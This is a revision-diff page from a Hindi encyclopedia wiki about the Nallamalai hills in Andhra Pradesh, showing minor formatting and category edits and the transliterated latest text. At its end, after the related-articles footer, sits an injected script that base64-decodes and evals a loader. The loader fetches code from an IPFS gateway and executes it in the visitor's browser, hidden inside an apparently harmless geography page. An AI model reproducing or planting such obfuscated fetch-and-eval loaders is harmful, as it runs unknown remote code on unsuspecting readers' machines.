Difference between revisions of "नल्लामलाई पर्वत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (श्रेणी:नया पन्ना; Adding category Category:आन्ध्र प्रदेश (Redirect Category:आन्ध्र प्रदेश resolved) (को हटा दिया गया हैं।))
m (Text replacement - "शृंखला" to "श्रृंखला")
 
(3 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*नल्लामलाई पर्वत, पूर्वी [[आन्ध्र प्रदेश]] राज्य में पूर्वी घाट की घाटियाँ एवं समानान्तर पर्वत श्रेणियाँ, दक्षिण-पूर्वी भारत में स्थित है।  
+
'''नल्लामलाई पर्वत''', पूर्वी [[आन्ध्र प्रदेश]] राज्य में पूर्वी घाट की घाटियाँ एवं समानान्तर पर्वत श्रेणियाँ, दक्षिण-पूर्वी भारत में स्थित है।  
 
*[[कृष्णा नदी]] के दक्षिण में स्थित ये पहाड़ियाँ उत्तर से दक्षिण की ओर, [[बंगाल की खाड़ी]] के कोरोमण्डल तट के समानान्तर स्थित हैं।  
 
*[[कृष्णा नदी]] के दक्षिण में स्थित ये पहाड़ियाँ उत्तर से दक्षिण की ओर, [[बंगाल की खाड़ी]] के कोरोमण्डल तट के समानान्तर स्थित हैं।  
 
*इनकी कुल लम्बाई लगभग 430 किलोमीटर है।  
 
*इनकी कुल लम्बाई लगभग 430 किलोमीटर है।  
Line 5: Line 5:
 
*लगभग 31 किलोमीटर चौड़ी नल्लामलाई श्रृंखला की औसत ऊँचाई 900 से 1100 मीटर है।  
 
*लगभग 31 किलोमीटर चौड़ी नल्लामलाई श्रृंखला की औसत ऊँचाई 900 से 1100 मीटर है।  
 
*ऊबड़-खाबड़, विरल आबादी वाले इस पर्वतीय क्षेत्र का अधिकांश हिस्सा स्फ़टिक और स्लेट पत्थरों का बना है और यह पूर्वी घाट के पर्वतीय परिदृश्य का उदाहरण है।
 
*ऊबड़-खाबड़, विरल आबादी वाले इस पर्वतीय क्षेत्र का अधिकांश हिस्सा स्फ़टिक और स्लेट पत्थरों का बना है और यह पूर्वी घाट के पर्वतीय परिदृश्य का उदाहरण है।
 
+
{{प्रचार}}
 
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=
 
|आधार=
Line 19: Line 18:
 
[[Category:पर्वत]]
 
[[Category:पर्वत]]
 
[[Category:भूगोल_कोश]]
 
[[Category:भूगोल_कोश]]
[[Category:आन्ध्र प्रदेश]]
+
[[Category:आंध्र प्रदेश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 11:07, 9 February 2021

nallamalaee parvat, poorvi andhr pradesh rajy mean poorvi ghat ki ghatiyaan evan samanantar parvat shreniyaan, dakshin-poorvi bharat mean sthit hai.

  • krishnaa nadi ke dakshin mean sthit ye paha diyaan uttar se dakshin ki or, bangal ki kha di ke koromandal tat ke samanantar sthit haian.
  • inaki kul lambaee lagabhag 430 kilomitar hai.
  • yah uttari sima palanad besin aur dakshini sima tirupati ki paha diyoan mean hai.
  • lagabhag 31 kilomitar chau di nallamalaee shrriankhala ki ausat ooanchaee 900 se 1100 mitar hai.
  • oob d-khab d, viral abadi vale is parvatiy kshetr ka adhikaansh hissa sfatik aur slet pattharoan ka bana hai aur yah poorvi ghat ke parvatiy paridrishy ka udaharan hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>